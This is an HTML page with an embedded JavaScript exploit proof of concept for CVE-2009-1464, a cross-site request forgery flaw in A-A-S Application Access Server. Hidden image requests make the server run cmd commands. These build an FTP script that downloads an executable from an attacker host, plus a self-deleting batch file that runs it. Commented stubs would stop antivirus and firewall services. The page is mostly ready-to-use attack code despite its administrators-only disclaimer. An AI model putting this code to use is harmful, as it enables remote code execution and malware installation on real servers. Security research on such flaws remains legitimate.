<html>
<body>

<!--
****************************************************************
AASHack 1.0 (By Felipe M. Aragon)
Affected Versions: AAS 2.0.48 and possibly older versions

This is an exploit demonstration code for the A-A-S (Application
Access Server) index.aas job parameter XSRF vulnerability
(CVE-2009-1464)

This script has been successfully tested on IE 7.0 and Firefox
3.08. Should work on any browser that has javascript enabled

Vulnerability found by Syhunt (http://www.syhunt.com)

This script should be used only by system administrators (or
other people in charge). Read the text below before making any
use of this script.

(c) 2009 Syhunt Cyber Security Company. All rights reserved.

This script is provided 'as-is', without any expressed or implied
warranty. In no event will the author be held liable for
any damages arising from the use of this script.
Permission is granted to anyone to use this script, and to alter
it and redistribute it freely, subject to the following
restrictions:

1. The origin of this script must not be misrepresented, you
   must not claim that you wrote the original code.
2. Altered source versions must be plainly marked as such, and
   must not be misrepresented as being the original script.
3. This notice may not be removed or altered from any source
   distribution.
   
If you have any questions concerning this license, please email
contact _at_ syhunt _dot_ com
****************************************************************
-->

<script>
// Javascript is used to force the browser to sequentially load
// the images that will trigger the server commands.

var dd=1000; // default delay time (ms)
var aas_url='http://[host]:6262'; // target AAS host
var ftp_host='x.x.x.x'; // attacker ftp host
var ftp_user='anonymous';
var ftp_pass='123456';
var ftp_commands_file='aashack.ftp';
var batch_file='aashack.bat';
var attacker_file='file.exe'; // file to upload

function delay(ms) {
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < ms);
}

function writeimg(job,action,select) {
var act = escape(action);
var sel = escape(select);
document.write('<img src="'+aas_url+'/index.aas?job='+job+'&action='+act+'&select='+sel+'" style="visibility:hidden;">');
}

// Main Functions
function Run(action,dms) { writeimg('command',action,''); delay(dms); }
function Console(cmdline,dms) { Run('cmd /C '+cmdline,dms); }
function AddFTPCmd(cmdline) { Console('echo '+cmdline+'>>'+ftp_commands_file,dd); }
function AddBatchLine(line) { Console('echo '+line+'>>'+batch_file,dd); }
//function Kill(exename) { Run('taskkill /f /im '+exename,dd); } // alternative way to kill a process
function StopSvc(servicename) { writeimg('setservice','stop',servicename); delay(dd); }
function KillProcess(exename) { writeimg('killprocess','',exename); delay(dd); }

function StopUndesiredServices() {
//StopSvc("somefirewall");
//StopSvc("someantivirus"); 
//StopSvc("wuauserv"); // Automatic Updates
}

function KillUndesiredProcesses() {
//KillProcess('firewall.exe');
}

AddFTPCmd(ftp_user);
AddFTPCmd(ftp_pass);
AddFTPCmd('binary');
AddFTPCmd('get '+attacker_file);
AddFTPCmd('close');
AddFTPCmd('bye');
AddBatchLine('@echo off');
AddBatchLine('ftp -is:'+ftp_commands_file+' '+ftp_host);
AddBatchLine('start '+attacker_file);
AddBatchLine('del '+ftp_commands_file);
AddBatchLine('del %0'); // self-destruct
StopUndesiredServices();
KillUndesiredProcesses();
Run(batch_file,dd);
</script>

</body>
</html>